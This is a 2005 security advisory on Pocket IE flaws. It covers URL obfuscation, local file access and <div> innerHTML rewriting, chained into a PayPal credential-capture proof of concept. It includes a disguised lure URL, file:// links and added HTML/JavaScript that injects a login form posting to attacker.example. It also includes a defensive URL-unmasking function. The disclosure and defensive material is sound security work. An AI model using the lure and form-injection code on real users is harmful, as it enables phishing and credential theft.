[NT] Multiple Pocket IE Vulnerabilities

Subject: [NT] Multiple Pocket IE Vulnerabilities
Date: 27 Jan 2005 15:06:47 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Multiple Pocket IE Vulnerabilities
------------------------------------------------------------------------


SUMMARY

There are several weaknesses in Pocket IE that can be used to trick end 
users into submitting local and/or sensitive data, such as usernames and 
passwords.

The potential for exploiting these vulnerabilities is restricted only by 
an attacker's imagination. However, Pocket IE is not as powerful as its big 
brother on the desktop, so an attacker is limited in the techniques she can 
use to launch the attack. For example, Pocket IE has no support for the 
IFRAME tag, which is extremely useful in XSS and browser-based attacks.

In addition, Pocket IE does not support every JavaScript command commonly 
used by attackers. The final example presented below combines these 
individual flaws into one attack and is only meant to serve as a proof of 
concept.

DETAILS

Flaw 1: Unicode URL Obfuscation
This particular attack is not new and has previously plagued PC-based 
browsers. Pocket IE (Windows Mobile 2003 SE) is also vulnerable to this 
problem. (The "Unicode" form used here is ordinary percent-encoding of the 
dotted IP address, which Pocket IE decodes before connecting.) In addition, 
Pocket IE accepts http URLs in the <protocol>://user:pass@website format. 
This by itself is not a problem, but when combined with a percent-encoded 
host it can cause confusion and mislead end users.

Example:
http://www.airscanner.com = 69.0.200.106 = %36%39%2E%30%2E%32%30%30%2E%31%30%36

Abuse:
http://www.paypal.com&login.rand-%00%01AE67D12EF9090AB933@%36%39%2E%30%2E%32%30%30%2E%31%30%36/
This will take you to http://www.airscanner.com/, not http://www.paypal.com: 
everything before the '@' is the user-name part of the URL, and the real host 
is the percent-encoded IP address after it.
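A check for the userinfo trick, as an added example that is not part of the advisory: it uses Node's built-in WHATWG URL parser, which percent-decodes the host the same way the advisory decodes it by hand, and flags a URL whose text before the '@' reads like a hostname or whose host is percent-encoded. The URLs in the usage call are the advisory's own plus one clean control; the function name and the shape of its result are assumptions of this example.

```javascript
// Added example, not part of the advisory: unmask a URL that hides its real
// host behind a userinfo section. Node's WHATWG URL parser percent-decodes
// the host for us; the userinfo part is decoded separately for display.
function unmaskUrl(raw) {
  const u = new URL(raw); // throws on unparseable input; that is the caller's signal

  // Authority as typed: everything between "//" and the next "/", "?" or "#".
  const schemeEnd = raw.indexOf("//");
  const authority = schemeEnd === -1 ? "" : raw.slice(schemeEnd + 2).split(/[\/?#]/)[0];
  const at = authority.lastIndexOf("@");
  const hasUserinfo = at !== -1;
  const rawHost = authority.slice(at + 1);
  const hostEncoded = /%[0-9a-f]{2}/i.test(rawHost);

  // Percent-decode the userinfo so "%00"/"%01" become visible instead of hidden.
  let shown = u.username + (u.password ? ":" + u.password : "");
  try { shown = decodeURIComponent(shown); } catch (e) { /* keep the raw form */ }
  const displayedAs = shown.replace(/[\x00-\x1f\x7f]/g,
    c => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0"));

  // The classic trick: userinfo that reads like a domain name.
  const lookalike = /[a-z0-9-]+\.[a-z]{2,}/i.test(shown);

  return {
    displayedAs,               // what a naive reader sees before the "@"
    realHost: u.hostname,      // where the request actually goes
    suspicious: hasUserinfo && (lookalike || hostEncoded),
  };
}

// Usage with the advisory's lure URL (constructed call; nothing is fetched).
const PAYPAL_LURE =
  "http://www.paypal.com&login.rand-%00%01AE67D12EF9090AB933@%36%39%2E%30%2E%32%30%30%2E%31%30%36/";
console.log(unmaskUrl(PAYPAL_LURE));
// realHost is "69.0.200.106" and suspicious is true
```

The check is deliberately stricter than "host is an IP": a userinfo section that looks like a hostname is a phishing signal regardless of what follows the '@', and a percent-encoded host is a signal even without userinfo-style lookalikes.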

Flaw 2: Local File Access
Pocket IE will open local files from a web page, either loading them into 
the browser for viewing or launching them with their default program. This 
includes, but is not limited to, the following file types. The links below 
are the ones given in the original advisory, meant to be clicked on the 
device; they are subject to OEM variations and may or may not work on your 
PDA:
 * xls - file://\windows\vehicleml.pxt')/
 * htc & htp (in IE) - file://\windows\clndr.htm/
 * cpl items - file://\windows\backlight.cpl')/
 * ini files (in IE) - file://\windows\initdb.ini')/
 * 2bp images (in IE) - file://\windows\win_start.2bp')/
 * go to any folder - file://\windows\startup')/
 * go to 00 (root) folder - file://\%00')/

Flaw 3: <div> Tag XSS
Strictly speaking, this is not a flaw. However, it provides a vector for 
attack, so it is worth mentioning. If a local file can be loaded into a 
frame in Pocket IE, and that local file contains a named <div> section, 
then that section can be overwritten from a remote page loaded in an 
adjoining frame. This is accomplished via JavaScript using 'innerHTML'. 
With this ability, a loaded local page can be rewritten by a loaded remote 
page. The same write does not work against a page that was itself loaded 
from a remote host, so the attack depends on getting a local copy of the 
target page into the frame.

Combination Attack
The following example assumes one thing: that the attacker knows a folder 
name inside the temporary IE store. These folders are given random names 
each time a PDA is hard reset; once set, the names persist even if the 
folders are deleted. The proof of concept assumes you know this folder 
name, or have access to this information. It only takes a second to browse 
to the '\Windows\Profiles\guest\Temporary Internet Files\Content.IE5' 
directory to learn these folder names.

This attack demonstrates how access to a local file can be a problem. Via 
URL obfuscation (Flaw 1), <div>-based XSS (Flaw 3), and local file access 
(Flaw 2), it shows how a www.paypal.com username and password can be 
captured from an unsuspecting end user. The following steps demonstrate 
this. All captured information will be emailed to your 'paypal' email 
address... really, you can trust me.
 1. Clear Pocket IE history, cookies, and cached files (Tools-->Memory in 
Pocket IE) and reboot the device.
 2. Load www.paypal.com in Pocket IE.
 3. Open File Explorer, go to the \Windows\Profiles\guest\Temporary 
Internet Files\Content.IE5\ directory, and locate the file 'paypal[1]'. 
Note the name of the folder it sits in.
 4. Go to http://www%2Epaypal%2Ecom&login%2Erand-%00%01AE67D12EF9090AB933@%36%39%2e%30%2e%32%30%30%2e%31%30%36/tests/ie_flaw/ie1.htm 
and enter the folder name when prompted (you must click this link; it takes 
you to http://www.airscanner.com/tests/ie_flaw/ie1.htm, not paypal.com).
 5. Let the page 'load' and answer 'Yes' to the certificate prompts.
 6. Enter a username and password and submit.

You will be sent to a page that briefly shows you the captured 
information, and then passed to Paypal.com for actual login.
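How the <div> overwrite of Flaw 3 is wired into the combination attack above, as an added illustration that is not part of the advisory and not the airscanner.com proof of concept. The attacker host (attacker.example), the Content.IE5 subfolder name (ABCDEFGH), the id of the named <div> in the cached page (login), the form field names and the use of getElementById are all assumptions; the real cached page has to be inspected first, which is what step 3 is for, and the address of attack.htm would be dressed up with the Flaw 1 trick in the same way as the link in step 4.

```html
<!-- attack.htm, served from the attacker's host. Frame "cached" loads the
     victim's locally cached copy of the target login page; frame "injector"
     loads a remote page whose script rewrites the cached page in place. -->
<html>
<frameset rows="*,0" border="0">
  <!-- Subfolder name ABCDEFGH is an assumption: it differs per device and
       must be learned as in step 3. -->
  <frame name="cached"
         src="file://\Windows\Profiles\guest\Temporary Internet Files\Content.IE5\ABCDEFGH\paypal[1].htm">
  <frame name="injector" src="http://attacker.example/inject.htm">
</frameset>
</html>

<!-- inject.htm, served from the attacker's host. Because the sibling frame
     holds a local file rather than a remote page, Pocket IE lets this script
     reach into it and replace a named <div> through innerHTML (Flaw 3). -->
<html>
<body>
<script type="text/javascript">
function rewriteCachedPage() {
  var doc = parent.frames["cached"].document;
  // "login" is an assumed id of a named <div> in the cached page.
  var target = doc.getElementById ? doc.getElementById("login") : doc.all["login"];
  if (!target) {
    // The cached frame has not finished loading yet: retry shortly.
    setTimeout(rewriteCachedPage, 500);
    return;
  }
  // The replacement form keeps the look of the real one but posts to the
  // attacker, who can then forward the victim to the real site (the
  // "briefly shows you the captured information" page above).
  target.innerHTML =
    '<form method="post" action="http://attacker.example/collect">' +
    'Email address: <input type="text" name="login_email"><br>' +
    'Password: <input type="password" name="login_password"><br>' +
    '<input type="submit" value="Log In">' +
    '</form>';
}
window.onload = rewriteCachedPage;
</script>
</body>
</html>
```

The two things a defender can verify on a device are the ones the attack depends on: whether a remote page is allowed to load a file:// URL into a frame at all (Flaw 2), and whether script in a remote frame can touch the DOM of a local-file frame (Flaw 3). If either is refused, the chain breaks regardless of the URL disguise.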


ADDITIONAL INFORMATION

The information has been provided by kers0r <mailto:root@asylum-nz.com>.
The original article can be found at:
http://www.airscanner.com/tests/ie_flaw/ie_attack.htm




DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 
